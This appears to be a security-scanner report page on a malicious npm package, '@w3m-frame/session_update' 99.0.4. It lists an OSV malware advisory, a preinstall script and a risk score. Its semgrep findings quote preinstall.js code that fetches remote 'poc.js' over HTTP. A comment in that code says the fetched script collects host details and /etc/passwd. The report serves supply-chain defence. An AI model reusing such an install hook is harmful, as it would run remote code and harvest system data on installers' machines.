@w3m-frame/session_update@99.0.4

session_update utilities

Maintainers

m0ntanatony

Keywords

bug bounty

SAST Findings (5)

CRITICAL MAL-2026-3122: Malicious code in @w3m-frame/session_update (npm) osv

--- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (c1eb7a6a13f58f487088eedef8df01c804fecfc771cf78992ec4510f3fc6e66e) The OpenSSF Package Analysis project identified '@w3m-frame/session_update' @ 99.0.4 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.

HIGH Package has 'preinstall' script install-scripts

Script: node preinstall.js

HIGH etc-passwd-access: poc.preinstall.js:13 semgrep

Accessing /etc/passwd or /etc/shadow — credential harvesting on Linux 11 | const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-"); 12 | > 13 | // Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only) 14 | http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => { 15 | let body = "";

HIGH etc-passwd-access: preinstall.js:13 semgrep

Accessing /etc/passwd or /etc/shadow — credential harvesting on Linux 11 | const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-"); 12 | > 13 | // Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only) 14 | http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => { 15 | let body = "";

LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.

Review Summary

Risk score: 100 (capped from 148). Findings: 1 critical (+40), 3 high (+75), 3 medium (+30), 1 low (+3).

Published to npm: 2026-04-27

@w3m-frame/session_update @99.0.4

Maintainers

Keywords

SAST Findings (5)

Review Summary